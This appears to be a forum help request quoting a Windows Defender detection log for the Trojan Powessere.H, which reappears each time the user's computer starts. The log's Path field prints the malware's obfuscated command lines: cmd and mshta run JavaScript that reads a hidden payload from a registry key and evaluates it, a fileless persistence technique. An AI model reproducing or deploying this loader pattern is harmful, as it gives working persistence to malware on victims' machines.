Persistent Trojan:Win32/Powessere.H
<blockquote data-quote="CainPDX" data-source="post: 715672" data-attributes="member: 70545">
<p>Event Viewer gave this information on Event 1116 which is one of many similar events that occur each time I turn on my computer:</p>
<p><span style="font-size: 12px">Windows Defender Antivirus has detected malware or other potentially unwanted software.</span></p>
<p><span style="font-size: 12px">For more information please see the following:</span></p>
<p><span style="font-size: 12px"><a href="https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Powessere.H&threatid=2147726088&enterprise=0" target="_blank">Trojan:Win32/Powessere.H threat description - Windows Defender Security Intelligence</a></span></p>
<p><span style="font-size: 12px">Name: Trojan:Win32/Powessere.H</span></p>
<p><span style="font-size: 12px">ID: 2147726088</span></p>
<p><span style="font-size: 12px">Severity: Severe</span></p>
<p><span style="font-size: 12px">Category: Trojan</span></p>
<p><span style="font-size: 12px">Path: CmdLine:_\Device\HarddiskVolume3\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C start "" mshta.exe "javascript:np8si="wPk";U5s=new ActiveXObject("WScript.Shell");DY3YUb4="cf0QT2cs";ht9kH1=U5s.RegRead("HKCU\\software\\eewn\\jmvryxenjm");B9OL8lS="v3R7";eval(ht9kH1);yod1qRHe="najkzw5";";CmdLine:_\Device\HarddiskVolume3\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C start "" mshta.exe "javascript:p1ytp3UQ="OsEleDvM";T9w9=new ActiveXObject("WScript.Shell");jqZ5p="z85p";O1w2wW=T9w9.RegRead("HKCU\\software\\eewn\\jmvryxenjm");W0kFQ0aRP="Moquky";eval(O1w2wW);yevFGLg7="TNvL";";CmdLine:_\Device\HarddiskVolume3\Windows\System32\mshta.exe "mshta.exe" "javascript:HIYtYH1X="BbcyJUP";rs47=new ActiveXObject("WScript.Shell");iM5UN9Ac="X";mYgT0=rs47.RegRead("HKCU\\software\\eewn\\jmvryxenjm");S1Slz="ZtF9r";eval(mYgT0);RuWi9="jbZ8qk";"</span></p>
<p><span style="font-size: 12px">Detection Origin: Unknown</span></p>
<p><span style="font-size: 12px">Detection Type: Concrete</span></p>
<p><span style="font-size: 12px">Detection Source: System</span></p>
<p><span style="font-size: 12px">User: NT AUTHORITY\SYSTEM</span></p>
<p><span style="font-size: 12px">Process Name: Unknown</span></p>
<p><span style="font-size: 12px">Signature Version: AV: 1.263.119.0, AS: 1.263.119.0, NIS: 118.2.0.0</span></p>
<p><span style="font-size: 12px">Engine Version: AM: 1.1.14600.4, NIS: 2.1.14202.0</span></p>
</blockquote>